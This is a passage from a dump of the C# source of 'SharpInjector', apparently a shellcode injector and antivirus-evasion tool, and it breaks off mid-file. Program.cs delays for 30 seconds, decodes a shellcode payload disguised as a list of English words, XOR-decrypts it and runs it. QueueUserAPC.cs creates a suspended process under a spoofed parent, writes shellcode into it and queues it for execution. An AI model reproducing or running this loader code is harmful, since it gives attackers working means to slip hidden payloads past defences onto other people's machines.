    "content": "﻿using System;\r\nusing System.IO;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nusing System.Diagnostics;\r\nusing System.Windows.Forms;\r\nusing System.Runtime.InteropServices;\r\nusing System.Security.Cryptography;\r\nusing System.Net;\r\nusing System.Threading;\r\n\r\n\r\nnamespace SharpInjector\r\n{\r\n    class Program\r\n    {\r\n        private static byte[] xor(byte[] cipher, byte[] key)\r\n        {\r\n            byte[] decrypted = new byte[cipher.Length];\r\n\r\n            for (int i = 0; i < cipher.Length; i++)\r\n            {\r\n                decrypted[i] = (byte)(cipher[i] ^ key[i % key.Length]);\r\n            }\r\n\r\n            return decrypted;\r\n        }\r\n        static void Main(string[] args)\r\n        {\r\n            Thread.Sleep(1000*30);\r\n            Console.WriteLine(\"seleep over\");\r\n            string p = \"puffs knives definitions offering principal peg footing thermals berths observer knives catch publication berths drive spots strings knives truths anticipation resolution occurrence cuff berths shed knives odors yaws company occurrence cuff berths polish knives odors harbor centimeter occurrence buzzes spans sets noises prefix change guess occurrence lifetimes resident differences change glances updates reliabilities specialties formation scenes cabinet facilities drive addresses friday emergency hills apples thermals airfield welds sod honor alkalinity formation bypasses conversions change airfield accumulations communications monolith telecommunication commanders occurrence friday friday similarity similarity spare twist anticipation berths observer drydocks sod certifications lamps adherence default hardcopies others experiences scope honor occurrence seeds shortages rate sponges thermocouples prefix friday surges bails others hardcopies expiration grids addresses honor ounce spare eighths drive twist prefix change guess 
occurrence lifetimes resident differences airfield ornaments cabinet alkalinity mules thermals point subtotal spans entrances entry vent expenditures science scratch entries sod default bypasses harbor swamps armory shortages rate sponges chimney prefix friday surges default scenes rate accumulations airfield hazard honor restrictions noises properties drive deletions knives stalls armory cuff properties expenditures sum airfield reams addresses ohms friday count entries prefix welds knives animals publication count properties feeders offering pools knives yaws auditor bails armory scenes catch centimeter airfield stalls slice merchant gyros wave principal expiration animals lifetimes subordinates settings halves pools speeders defeats share analyses resolution prefixes expenditures scenes strings hazard military boy vent bypasses researcher scenes airfields addresses answers information entries jail stones eighths mirrors facilities airfield change ditto slice lifetimes resident knives programmers grids addresses centimeter mules spots scenes airfields sprayer yaws telephone pen jail stones merchant formation centimeter airfield result defections mules stage alkalinity berths observer drydocks sponges artillery rebounds copy spots prefix reams analyses armory publication drive copy recruits ohms clock point defections auditor military peg armory balances knives military nylon chemicals evaluations result properties desert ditto prefix change guess alkalinity radios thermals alkalinity sponges swamps yaws welds mules vacuum merchant homes cash messenger alarms anticipation occurrence anticipation apprehensions hardcopies stones shipments scope share yaws drydocks eighths desert presence airfield result deletions settings apprehensions resident principal expiration glow alarms conversions evaluations stresses berths thermals airfield book pools accumulations hardcopies chimney wave deletions surges facilities professionals certifications ornaments thermals thermals 
berths knives glow circumstances berths programs communications expenditures berths observer nozzle spare executions gleam thermals thermals berths halves jeopardy alarms auditor jail specialties eighths speeders thermals catch entries thermocouples boy grids gleam eighths programmers shed stage sleep messenger deductions deletions glow vent count shaft acronyms occurrence sum noises telecommunications harbor prefixes ohms pails friday hazard congress circulation answers apples change state deductions addresses stresses defeats radios knob sprayer balances presence principal prefixes executions jail noises restrictions professionals telecommunications pools grids equivalents deviation deletions cavity feeders emergency occurrence shed meters commanders equivalents equivalents reliabilities speeders thermocouples radios strip knives deductions reams chimney suggestions outfit defect share nose defect addresses pull default truths knob fares pools prefix acronyms technician change sprayer artillery evaluations commanders subtotal knob sprayer telecommunications answers mirrors inspection pull specialties speeders answers change mirrors artillery share artillery thermocouples sponges buzzes settings shortages loans subtotal cash hoofs chock builders professionals fares hoofs ounce resolution answers answers builders chief professionals loans default cash truths chock builders others defect radios ounce shed lifetimes specialties polish ounce similarity lifetimes radios pools sponges analyses speeders sprayer spots chock updates glances defeat change knob welds catch thermals harbor eliminator boy auditor homes gyros gyroscope stones programmers principal adherence fans drive subordinates participation cash stones strings defect entries eliminator nozzle harness photograph drive telecommunications twist centimeter surplus result book subtotal resident slopes professionals spokes navy recruits participation noises share voices thermocouples alkalinity addresses boy 
glances apprehensions share congress scope entries definitions shortages damages intervals differences sleep gyros balances ditto vent routine builders technician hardcopies slice entries slice meters feeders stalls guess researcher meters tents scope speeders change pull gleam crusts adhesives subordinates hardcopies magazine auxiliaries offering balances circulation chock photograph military resolution scratch labors knives conversions rate resolution sets bails addresses slopes eighths cavity fares updates hardcopies shaft routine company puffs defeat eighths polish inspection technician odors animals slopes subordinates labors participation expiration point communications shaft anticipation artillery outfit congress round hills buzzes voices spans programmers swamps shaft hardcopies speeders congress shipments resident chock crusts footing shortage budget radios jeopardy occurrence puffs defeats sum alarms gyroscope budget clock scenes fares merchant sets halves conversions comment reams wave centimeter surges transmitter thermocouples book ounce eighths presence certifications sets comment airfields navy race communications strings observer ticket seeds properties budget cabinet mules centimeter twist specialties fares surplus settings centimeter settings cabinet mirrors ways meters twist lifetimes voices carpet stage auditor cathode hardcopies shipments suggestions copy offering auditor bails jeopardy participation auditor military properties fasteners nylon apples drydocks entries noises suggestions copy carpet berths adhesives drydocks entries publication vacuum scenes thermals berths observer knives sessions ohms presence berths shaft principal sum airfield footing buzzes spots properties spare nozzle knives military entry chemicals bypasses desert scenes peg observer thermocouples entries subordinates settings anticipation weeks prefix apples chief student stones sessions differences odors hardcopies stones cathode chimney certifications lamps adherence 
sleep analyses slopes armory sod friday point plating resident technician telecommunication reams suggestions ohms occurrence strings thermals berths observer drydocks scope facilities peg facilities jail principal expiration truths mirrors truths alloy lifetimes ounce subtotal cash hoofs knob artillery fasteners lifetimes thermals animals drydocks ammonia share\";\r\n            string s = \"evaluations shed fasteners lifetimes share ounce acronyms analyses speeders pull defeats resolution glances inspection strip telephone telecommunications formation loans technician updates nose scratch entrances crusts answers harbor similarity specialties alloy prefix sod vent conversions sponges airfield chemicals circulation addresses hardcopies seeds sets knives hazard noises publication animals suggestions expenditures thermals homes reams ohms strings catch scope balances yaws welds buzzes centimeter participation defect polish defeat pools prefixes adherence knob routine chimney cash commanders thermocouples builders information mirrors chock fans default programmers messenger monolith change subtotal radios fares truths hoofs sprayer artillery drive berths spots alkalinity observer others professionals outfit accumulations entries armory count reliabilities drydocks subordinates friday mules restrictions scenes copy adhesives company shortages settings occurrence properties eighths slice gyros science chief state spans sleep nozzle executions vacuum recruits stage carpet halves offering round boy auditor glow comment gyroscope presence alarms pails entry voices expiration deductions puffs principal cabinet meters equivalents grids surplus circumstances guess nylon cathode intervals ornaments facilities shipments defections feeders sum twist telecommunication deletions programs auxiliaries plating bypasses cuff spare anticipation ditto experiences communications labors race ways transmitter researcher magazine deviation pen weeks wave differences jail jeopardy hills 
bails ammonia sessions photograph gleam shaft book merchant peg cavity airfields harness ticket apples result surges stalls eliminator military honor odors stones desert swamps rate certifications spokes clock definitions slopes emergency lamps point resident shortage apprehensions navy budget rebounds congress footing stresses tents damages student\";\r\n            char[] raw = { (char)0, (char)1, (char)2, (char)3, (char)4, (char)5, (char)6, (char)7, (char)8, (char)9, (char)10, (char)11, (char)12, (char)14, (char)15, (char)16, (char)17, (char)18, (char)19, (char)20, (char)21, (char)22, (char)23, (char)24, (char)25, (char)26, (char)27, (char)28, (char)29, (char)31, (char)32, (char)33, (char)34, (char)35, (char)36, (char)37, (char)38, (char)39, (char)40, (char)41, (char)42, (char)43, (char)44, (char)45, (char)46, (char)47, (char)48, (char)49, (char)50, (char)51, (char)52, (char)53, (char)54, (char)55, (char)56, (char)57, (char)58, (char)59, (char)60, (char)61, (char)62, (char)63, (char)64, (char)65, (char)67, (char)68, (char)69, (char)70, (char)71, (char)72, (char)73, (char)74, (char)75, (char)77, (char)78, (char)79, (char)80, (char)82, (char)83, (char)84, (char)85, (char)86, (char)87, (char)88, (char)89, (char)90, (char)91, (char)92, (char)93, (char)94, (char)95, (char)96, (char)97, (char)98, (char)99, (char)100, (char)101, (char)102, (char)103, (char)104, (char)105, (char)106, (char)107, (char)108, (char)109, (char)110, (char)111, (char)112, (char)113, (char)114, (char)115, (char)116, (char)118, (char)119, (char)120, (char)121, (char)122, (char)123, (char)124, (char)125, (char)126, (char)127, (char)130, (char)132, (char)133, (char)134, (char)135, (char)136, (char)137, (char)138, (char)139, (char)140, (char)141, (char)142, (char)143, (char)145, (char)146, (char)147, (char)148, (char)149, (char)150, (char)151, (char)152, (char)154, (char)155, (char)156, (char)157, (char)158, (char)160, (char)161, (char)162, (char)164, (char)165, (char)166, (char)167, (char)168, 
(char)169, (char)170, (char)172, (char)173, (char)174, (char)175, (char)176, (char)177, (char)178, (char)179, (char)180, (char)181, (char)182, (char)183, (char)184, (char)185, (char)186, (char)187, (char)188, (char)189, (char)190, (char)191, (char)192, (char)193, (char)194, (char)195, (char)197, (char)198, (char)201, (char)202, (char)204, (char)205, (char)206, (char)207, (char)208, (char)209, (char)210, (char)211, (char)212, (char)213, (char)214, (char)215, (char)216, (char)217, (char)218, (char)219, (char)220, (char)221, (char)222, (char)224, (char)225, (char)226, (char)227, (char)228, (char)229, (char)230, (char)231, (char)232, (char)233, (char)234, (char)235, (char)236, (char)237, (char)238, (char)239, (char)240, (char)241, (char)242, (char)243, (char)244, (char)245, (char)246, (char)247, (char)248, (char)249, (char)250, (char)251, (char)253, (char)254, (char)255 };\r\n            string[] sArray = s.Split(' ');\r\n            string[] pArray = p.Split(' ');\r\n\r\n\r\n            char[] ret_char = new char[pArray.Length];\r\n\r\n\r\n            int index = 0;\r\n            for (int i = 0; i < pArray.Length; ++i)\r\n            {\r\n                for (int j = 0; j < sArray.Length; ++j)\r\n                {\r\n                    if (pArray[i] == sArray[j])\r\n                    {\r\n                        ret_char[index] = raw[j];\r\n                        index++;\r\n                    }\r\n                }\r\n            }\r\n            byte[] encryptedShellcode = new byte[ret_char.Length];\r\n\r\n            for (int k = 0; k < ret_char.Length; k++)\r\n            {\r\n\r\n                encryptedShellcode[k] = (byte)ret_char[k];\r\n\r\n            }\r\n\r\n\r\n\r\n            string key = \"admin123\";\r\n            byte[] shellcode = null;\r\n            shellcode = xor(encryptedShellcode, Encoding.ASCII.GetBytes(key));\r\n\r\n            EtwpCreateEtwThread.ExecuteEtwpCreateEtwThread(shellcode);\r\n\r\n            return;\r\n\r\n        
}\r\n\r\n        private static UInt32 MEM_COMMIT = 0x1000;\r\n        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\r\n\r\n        // The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject\r\n        [DllImport(\"kernel32\")]\r\n        private static extern UInt32 VirtualAlloc(\r\n            UInt32 lpStartAddr,\r\n            UInt32 size,\r\n            UInt32 flAllocationType,\r\n            UInt32 flProtect\r\n        );\r\n\r\n        [DllImport(\"kernel32\")]\r\n        private static extern IntPtr CreateThread(\r\n            UInt32 lpThreadAttributes,\r\n            UInt32 dwStackSize,\r\n            UInt32 lpStartAddress,\r\n            IntPtr param,\r\n            UInt32 dwCreationFlags,\r\n            ref UInt32 lpThreadId\r\n        );\r\n\r\n        [DllImport(\"kernel32\")]\r\n        private static extern UInt32 WaitForSingleObject(\r\n            IntPtr hHandle,\r\n            UInt32 dwMilliseconds\r\n        );\r\n\r\n        // Decryptor func\r\n        public static string Dec(string ciphertext)\r\n        {\r\n            string key = \"01010101010101010101010101010101\"; // CHANGE THIS 16/24/32 BYTE VALUE TO MATCH ENCRYPTION KEY\r\n\r\n            byte[] iv = new byte[16];\r\n            byte[] buffer = Convert.FromBase64String(ciphertext);\r\n\r\n            using (Aes aes = Aes.Create())\r\n            {\r\n                aes.Key = Encoding.UTF8.GetBytes(key);\r\n                aes.IV = iv;\r\n\r\n                ICryptoTransform decryptor = aes.CreateDecryptor(aes.Key, aes.IV);\r\n\r\n                using (MemoryStream ms = new MemoryStream(buffer))\r\n                {\r\n                    using (CryptoStream cs = new CryptoStream((Stream)ms, decryptor, CryptoStreamMode.Read))\r\n                    {\r\n                        using (StreamReader sr = new StreamReader((Stream)cs))\r\n                        {\r\n                            return sr.ReadToEnd();\r\n                        }\r\n     
               }\r\n                }\r\n            }\r\n        }\r\n\r\n        // Execution Types\r\n        public enum ExecutionMethod\r\n        {\r\n            CreateFiber,\r\n            CreateRemoteThread,\r\n            CreateRemoteThreadEx,\r\n            CreateThread,\r\n            EtwpCreateEtwThread,\r\n            QueueUserAPC,\r\n            RtlCreateUserThread\r\n        }\r\n\r\n    }\r\n\r\n}\r\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/Properties/AssemblyInfo.cs",
    "content": "﻿using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Information about an assembly is controlled through the following\n// set of attributes. Change these attribute values to modify the information\n// associated with an assembly.\n[assembly: AssemblyTitle(\"SharpInjector\")]\n[assembly: AssemblyDescription(\"\")]\n[assembly: AssemblyConfiguration(\"\")]\n[assembly: AssemblyCompany(\"\")]\n[assembly: AssemblyProduct(\"SharpInjector\")]\n[assembly: AssemblyCopyright(\"Copyright ©  2020\")]\n[assembly: AssemblyTrademark(\"\")]\n[assembly: AssemblyCulture(\"\")]\n\n// Setting ComVisible to false makes the types in this assembly not visible\n// to COM components.  If you need to access a type in this assembly from\n// COM, set the ComVisible attribute to true on that type.\n[assembly: ComVisible(false)]\n\n// The following GUID is for the ID of the typelib if this project is exposed to COM\n[assembly: Guid(\"4744c438-5a65-4ec7-89bd-2a027531b2b0\")]\n\n// Version information for an assembly consists of the following four values:\n//\n//      Major Version\n//      Minor Version\n//      Build Number\n//      Revision\n//\n// You can specify all the values or you can default the Build and Revision Numbers\n// by using the '*' as shown below:\n// [assembly: AssemblyVersion(\"1.0.*\")]\n[assembly: AssemblyVersion(\"1.0.0.0\")]\n[assembly: AssemblyFileVersion(\"1.0.0.0\")]\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/Properties/Resource1.Designer.cs",
    "content": "﻿//------------------------------------------------------------------------------\r\n// <auto-generated>\r\n//     This code was generated by a tool.\r\n//     Runtime Version:4.0.30319.42000\r\n//\r\n//     Changes to this file may cause incorrect behavior and will be lost if\r\n//     the code is regenerated.\r\n// </auto-generated>\r\n//------------------------------------------------------------------------------\r\n\r\nnamespace SharpInjector.Properties {\r\n    using System;\r\n    \r\n    \r\n    /// <summary>\r\n    ///   A strongly-typed resource class, for looking up localized strings, etc.\r\n    /// </summary>\r\n    // This class was auto-generated by the StronglyTypedResourceBuilder\r\n    // class via a tool like ResGen or Visual Studio.\r\n    // To add or remove a member, edit your .ResX file then rerun ResGen\r\n    // with the /str option, or rebuild your VS project.\r\n    [global::System.CodeDom.Compiler.GeneratedCodeAttribute(\"System.Resources.Tools.StronglyTypedResourceBuilder\", \"17.0.0.0\")]\r\n    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]\r\n    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]\r\n    internal class Resource1 {\r\n        \r\n        private static global::System.Resources.ResourceManager resourceMan;\r\n        \r\n        private static global::System.Globalization.CultureInfo resourceCulture;\r\n        \r\n        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute(\"Microsoft.Performance\", \"CA1811:AvoidUncalledPrivateCode\")]\r\n        internal Resource1() {\r\n        }\r\n        \r\n        /// <summary>\r\n        ///   Returns the cached ResourceManager instance used by this class.\r\n        /// </summary>\r\n        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]\r\n        internal static global::System.Resources.ResourceManager ResourceManager {\r\n            get {\r\n                if (object.ReferenceEquals(resourceMan, null)) {\r\n                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager(\"SharpInjector.Properties.Resource1\", typeof(Resource1).Assembly);\r\n     
               resourceMan = temp;\r\n                }\r\n                return resourceMan;\r\n            }\r\n        }\r\n        \r\n        /// <summary>\r\n        ///   Overrides the current thread's CurrentUICulture property for all\r\n        ///   resource lookups using this strongly typed resource class.\r\n        /// </summary>\r\n        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]\r\n        internal static global::System.Globalization.CultureInfo Culture {\r\n            get {\r\n                return resourceCulture;\r\n            }\r\n            set {\r\n                resourceCulture = value;\r\n            }\r\n        }\r\n        \r\n        /// <summary>\r\n        ///   Looks up a localized resource of type System.Byte[].\r\n        /// </summary>\r\n        internal static byte[] 莫文蔚___这世界那么多人 {\r\n            get {\r\n                object obj = ResourceManager.GetObject(\"莫文蔚___这世界那么多人\", resourceCulture);\r\n                return ((byte[])(obj));\r\n            }\r\n        }\r\n    }\r\n}\r\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/Properties/Resource1.resx",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<root>\r\n  <!-- \r\n    Microsoft ResX Schema \r\n    \r\n    Version 2.0\r\n    \r\n    The primary goals of this format is to allow a simple XML format \r\n    that is mostly human readable. The generation and parsing of the \r\n    various data types are done through the TypeConverter classes \r\n    associated with the data types.\r\n    \r\n    Example:\r\n    \r\n    ... ado.net/XML headers & schema ...\r\n    <resheader name=\"resmimetype\">text/microsoft-resx</resheader>\r\n    <resheader name=\"version\">2.0</resheader>\r\n    <resheader name=\"reader\">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>\r\n    <resheader name=\"writer\">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>\r\n    <data name=\"Name1\"><value>this is my long string</value><comment>this is a comment</comment></data>\r\n    <data name=\"Color1\" type=\"System.Drawing.Color, System.Drawing\">Blue</data>\r\n    <data name=\"Bitmap1\" mimetype=\"application/x-microsoft.net.object.binary.base64\">\r\n        <value>[base64 mime encoded serialized .NET Framework object]</value>\r\n    </data>\r\n    <data name=\"Icon1\" type=\"System.Drawing.Icon, System.Drawing\" mimetype=\"application/x-microsoft.net.object.bytearray.base64\">\r\n        <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>\r\n        <comment>This is a comment</comment>\r\n    </data>\r\n                \r\n    There are any number of \"resheader\" rows that contain simple \r\n    name/value pairs.\r\n    \r\n    Each data row contains a name, and value. The row also contains a \r\n    type or mimetype. Type corresponds to a .NET class that support \r\n    text/value conversion through the TypeConverter architecture. 
\r\n    Classes that don't support this are serialized and stored with the \r\n    mimetype set.\r\n    \r\n    The mimetype is used for serialized objects, and tells the \r\n    ResXResourceReader how to depersist the object. This is currently not \r\n    extensible. For a given mimetype the value must be set accordingly:\r\n    \r\n    Note - application/x-microsoft.net.object.binary.base64 is the format \r\n    that the ResXResourceWriter will generate, however the reader can \r\n    read any of the formats listed below.\r\n    \r\n    mimetype: application/x-microsoft.net.object.binary.base64\r\n    value   : The object must be serialized with \r\n            : System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\r\n            : and then encoded with base64 encoding.\r\n    \r\n    mimetype: application/x-microsoft.net.object.soap.base64\r\n    value   : The object must be serialized with \r\n            : System.Runtime.Serialization.Formatters.Soap.SoapFormatter\r\n            : and then encoded with base64 encoding.\r\n\r\n    mimetype: application/x-microsoft.net.object.bytearray.base64\r\n    value   : The object must be serialized into a byte array \r\n            : using a System.ComponentModel.TypeConverter\r\n            : and then encoded with base64 encoding.\r\n    -->\r\n  <xsd:schema id=\"root\" xmlns=\"\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:msdata=\"urn:schemas-microsoft-com:xml-msdata\">\r\n    <xsd:import namespace=\"http://www.w3.org/XML/1998/namespace\" />\r\n    <xsd:element name=\"root\" msdata:IsDataSet=\"true\">\r\n      <xsd:complexType>\r\n        <xsd:choice maxOccurs=\"unbounded\">\r\n          <xsd:element name=\"metadata\">\r\n            <xsd:complexType>\r\n              <xsd:sequence>\r\n                <xsd:element name=\"value\" type=\"xsd:string\" minOccurs=\"0\" />\r\n              </xsd:sequence>\r\n              <xsd:attribute name=\"name\" use=\"required\" type=\"xsd:string\" />\r\n              
<xsd:attribute name=\"type\" type=\"xsd:string\" />\r\n              <xsd:attribute name=\"mimetype\" type=\"xsd:string\" />\r\n              <xsd:attribute ref=\"xml:space\" />\r\n            </xsd:complexType>\r\n          </xsd:element>\r\n          <xsd:element name=\"assembly\">\r\n            <xsd:complexType>\r\n              <xsd:attribute name=\"alias\" type=\"xsd:string\" />\r\n              <xsd:attribute name=\"name\" type=\"xsd:string\" />\r\n            </xsd:complexType>\r\n          </xsd:element>\r\n          <xsd:element name=\"data\">\r\n            <xsd:complexType>\r\n              <xsd:sequence>\r\n                <xsd:element name=\"value\" type=\"xsd:string\" minOccurs=\"0\" msdata:Ordinal=\"1\" />\r\n                <xsd:element name=\"comment\" type=\"xsd:string\" minOccurs=\"0\" msdata:Ordinal=\"2\" />\r\n              </xsd:sequence>\r\n              <xsd:attribute name=\"name\" type=\"xsd:string\" use=\"required\" msdata:Ordinal=\"1\" />\r\n              <xsd:attribute name=\"type\" type=\"xsd:string\" msdata:Ordinal=\"3\" />\r\n              <xsd:attribute name=\"mimetype\" type=\"xsd:string\" msdata:Ordinal=\"4\" />\r\n              <xsd:attribute ref=\"xml:space\" />\r\n            </xsd:complexType>\r\n          </xsd:element>\r\n          <xsd:element name=\"resheader\">\r\n            <xsd:complexType>\r\n              <xsd:sequence>\r\n                <xsd:element name=\"value\" type=\"xsd:string\" minOccurs=\"0\" msdata:Ordinal=\"1\" />\r\n              </xsd:sequence>\r\n              <xsd:attribute name=\"name\" type=\"xsd:string\" use=\"required\" />\r\n            </xsd:complexType>\r\n          </xsd:element>\r\n        </xsd:choice>\r\n      </xsd:complexType>\r\n    </xsd:element>\r\n  </xsd:schema>\r\n  <resheader name=\"resmimetype\">\r\n    <value>text/microsoft-resx</value>\r\n  </resheader>\r\n  <resheader name=\"version\">\r\n    <value>2.0</value>\r\n  </resheader>\r\n  <resheader name=\"reader\">\r\n    
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>\r\n  </resheader>\r\n  <resheader name=\"writer\">\r\n    <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>\r\n  </resheader>\r\n  <assembly alias=\"System.Windows.Forms\" name=\"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\" />\r\n  <data name=\"莫文蔚___这世界那么多人\" type=\"System.Resources.ResXFileRef, System.Windows.Forms\">\r\n    <value>..\\Resources\\莫文蔚 - 这世界那么多人.mp3;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>\r\n  </data>\r\n</root>"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/QueueUserAPC.cs",
    "content": "﻿using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\n\nnamespace SharpInjector\n{\n    class QueueUserAPC\n    {\n        public static void ExecuteQueueUserAPC(string ParentName, string ProgramPath, byte[] Shellcode)\n        {\n            WinAPI.STARTUPINFOEX StartupInfoEx = new WinAPI.STARTUPINFOEX();\n            IntPtr lpSize = IntPtr.Zero;\n\n            WinAPI.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);\n            StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);\n            WinAPI.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize);\n\n            // Get handle on parent\n            Process ParentProcess = Process.GetProcessesByName(ParentName)[0];\n            Console.WriteLine($\"[*] Found parent process: {ParentProcess.ProcessName} (pid: {ParentProcess.Id})\");\n            IntPtr ParentHandle = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.PROCESS_CREATE_PROCESS | WinAPI.ProcessAccessFlags.PROCESS_DUP_HANDLE, false, ParentProcess.Id);\n\n            IntPtr lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);\n            Marshal.WriteIntPtr(lpValueProc, ParentHandle);\n\n            WinAPI.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)WinAPI.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);\n\n            WinAPI.SECURITY_ATTRIBUTES ps = new WinAPI.SECURITY_ATTRIBUTES();\n            WinAPI.SECURITY_ATTRIBUTES ts = new WinAPI.SECURITY_ATTRIBUTES();\n\n            ps.nLength = Marshal.SizeOf(ps);\n            ts.nLength = Marshal.SizeOf(ts);\n\n            IntPtr bytesWritten = IntPtr.Zero;\n\n\n            WinAPI.PROCESS_INFORMATION ProcessInfo = new WinAPI.PROCESS_INFORMATION();\n\n            bool success = WinAPI.CreateProcess(\n             
   ProgramPath,\n                null,\n                ref ps,\n                ref ts,\n                true,\n                WinAPI.ProcessCreationFlags.CREATE_SUSPENDED | WinAPI.ProcessCreationFlags.CREATE_NO_WINDOW | WinAPI.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT,\n                IntPtr.Zero,\n                null,\n                ref StartupInfoEx,\n                out ProcessInfo);\n\n            if (ProcessInfo.hProcess == IntPtr.Zero)\n            {\n                return;\n            }\n\n            Console.WriteLine($\"[*] Spawned new instance of {ProgramPath} (pid: {ProcessInfo.dwProcessId})\");\n            Process Target = Process.GetProcessById((int)ProcessInfo.dwProcessId);\n\n            Console.WriteLine(\"[*] Allocating shellcode...\");\n            IntPtr Address = WinAPI.VirtualAllocEx(Target.Handle, IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n            if (Address == IntPtr.Zero)\n            {\n                WinAPI.TerminateProcess(ProcessInfo.hProcess, 0);\n                return;\n            }\n\n            if (!WinAPI.WriteProcessMemory(ProcessInfo.hProcess, Address, Shellcode, Shellcode.Length, out bytesWritten))\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                return;\n            }\n\n            if (!WinAPI.VirtualProtectEx(ProcessInfo.hProcess, Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect))\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                return;\n            }\n\n            ProcessThreadCollection CurrentThreads = Process.GetProcessById((int)ProcessInfo.dwProcessId).Threads;\n            IntPtr Thread = WinAPI.OpenThread(WinAPI.ThreadAccess.SET_CONTEXT, false, CurrentThreads[0].Id);\n            if (Thread == IntPtr.Zero)\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n              
  return;\n            }\n\n            Console.WriteLine(\"[*] Calling QueueUserAPC...\");\n            IntPtr Ptr = WinAPI.QueueUserAPC(Address, Thread, IntPtr.Zero);\n            if (Ptr == IntPtr.Zero)\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                return;\n            }\n\n            uint SuspendCount = WinAPI.ResumeThread(ProcessInfo.hThread);\n            if (SuspendCount == 0)\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                return;\n            }\n\n            Console.WriteLine(\"[*] Shellcode queued for execution\");\n        }\n    }\n}\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/RtlCreateUserThread.cs",
    "content": "﻿using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Runtime.InteropServices;\nusing System.Windows.Forms;\nusing System.Diagnostics;\nusing System.Threading;\n\nnamespace SharpInjector\n{\n    class RtlCreateUserThread\n    {\n        public static void ExecuteRtlCreateUserThread(string ParentName, string ProgramPath, byte[] Shellcode)\n        {\n            WinAPI.STARTUPINFOEX StartupInfoEx = new WinAPI.STARTUPINFOEX();\n            IntPtr lpSize = IntPtr.Zero;\n\n            WinAPI.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);\n            StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);\n            WinAPI.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize);\n\n            // Get handle on parent\n            Process ParentProcess = Process.GetProcessesByName(ParentName)[0];\n            Console.WriteLine($\"[*] Found parent process: {ParentProcess.ProcessName} (pid: {ParentProcess.Id})\");\n            IntPtr ParentHandle = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.PROCESS_CREATE_PROCESS | WinAPI.ProcessAccessFlags.PROCESS_DUP_HANDLE, false, ParentProcess.Id);\n\n            IntPtr lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);\n            Marshal.WriteIntPtr(lpValueProc, ParentHandle);\n\n            WinAPI.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)WinAPI.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);\n\n            WinAPI.SECURITY_ATTRIBUTES ps = new WinAPI.SECURITY_ATTRIBUTES();\n            WinAPI.SECURITY_ATTRIBUTES ts = new WinAPI.SECURITY_ATTRIBUTES();\n\n            ps.nLength = Marshal.SizeOf(ps);\n            ts.nLength = Marshal.SizeOf(ts);\n\n            IntPtr bytesWritten = IntPtr.Zero;\n\n\n            WinAPI.PROCESS_INFORMATION ProcessInfo = new WinAPI.PROCESS_INFORMATION();\n\n            bool 
